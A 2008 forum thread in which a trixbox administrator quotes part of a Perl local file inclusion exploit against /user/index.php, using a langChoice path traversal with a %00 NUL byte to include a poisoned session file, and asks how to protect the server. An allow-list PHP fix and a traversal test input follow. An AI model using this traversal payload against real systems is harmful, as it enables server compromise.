adv Posted August 7, 2008

Hello, I have trixbox installed and recently I found out that there is an exploit with connect-back that you can use to get access to the server. The problem is in /user/index.php. I found the exploit, and it's written in Perl:

```perl
usage() unless @ARGV;
my $url = "http://$ARGV[0]/user/index.php";
my $ua = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
$ua->cookie_jar($cookie_jar);
menu();

sub execScript{
    my $scriptCode = shift;
    post($scriptCode);
    my $phpsessionid = extractPHPSID($cookie_jar->as_string);
    post("langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00");
}
```

It's getting access to /tmp. I've tried to chmod 755 /tmp, but then the index doesn't work; it gives an error.

```php
<?php
apache_setenv('QUERY_STRING',$_SERVER["QUERY_STRING"] = addslashes(strip_tags(urldecode($_SERVER["QUERY_STRING"]))));
apache_setenv('REQUEST_URI',$_SERVER["REQUEST_URI"] = addslashes(strip_tags(urldecode($_SERVER["REQUEST_URI"]))));
ini_set("error_reporting","E_ALL & ~E_NOTICE");
//session_start();
require 'includes/smartysetup.php';
require_once("includes/xajax.inc.php");
include "includes/tbversion.php"; // Grabs version of TrixBox from file /etc/trixbox/trixbox-version
$smarty->assign("tbversion",tbversion());
$smarty->assign("title","trixbox - User Mode");
...
?>
```

I've tried to comment out session_start(); it works, but does that cause any problems? How do I secure it to keep hackers out?
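The request in the exploit above works because a user-supplied langChoice value is turned into an include path, so traversal sequences and an encoded NUL byte (%00) reach the filesystem. As an added example (not trixbox code and not from this thread), this is the defensive shape a fix takes: resolve langChoice only through an allow-list, never by building a path from the input. The function names, language keys and file paths are assumptions.

```php
<?php
// Added example (hypothetical, not trixbox code): map the langChoice
// request parameter to a language file through an allow-list only.

// Accepted langChoice values and the files they select. Anything not in
// this table is rejected, so request input is never part of a path.
const LANG_FILES = [
    'en' => 'lang/en.php',
    'es' => 'lang/es.php',
    'de' => 'lang/de.php',
];
const DEFAULT_LANG = 'en';

/**
 * Return the language key to use for this request.
 * Unknown, empty or malformed values fall back to the default instead
 * of being interpolated into an include path.
 */
function resolveLangChoice(?string $raw): string
{
    if ($raw === null) {
        return DEFAULT_LANG;
    }
    // Only a two-letter lowercase code is acceptable, so "../", a NUL
    // byte (what %00 decodes to) and similar are refused before lookup.
    if (!preg_match('/\A[a-z]{2}\z/', $raw)) {
        // Log the rejected value hex-encoded so control bytes are visible.
        error_log('langChoice rejected: ' . bin2hex($raw));
        return DEFAULT_LANG;
    }
    return array_key_exists($raw, LANG_FILES) ? $raw : DEFAULT_LANG;
}

/** Absolute path of the language file for an allow-listed key. */
function langFileFor(string $key): string
{
    return __DIR__ . '/' . LANG_FILES[$key];
}

// Usage in user/index.php: resolve the parameter, then include only the
// file the allow-list names (the require is commented out here because
// the assumed lang/ files do not exist in this stand-alone example).
$lang = resolveLangChoice($_GET['langChoice'] ?? null);
// require langFileFor($lang);

// Constructed inputs: a valid key, the exploit-style traversal with a
// trailing NUL, and a well-formed code that is not on the list.
var_dump(resolveLangChoice('de'));
var_dump(resolveLangChoice("../../../../tmp/sess_abc\0"));
var_dump(resolveLangChoice('fr'));
```

Commenting out session_start() only removes the session file in /tmp that the traversal in this exploit points at; the traversal itself remains until the include is constrained like this.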
adv Posted August 8, 2008 Author

Hello... please, anybody?? :|
adv Posted August 16, 2008 Author

Sorry about the topic: I meant "trixbox problem". And doesn't anybody know what to do? How do I secure it?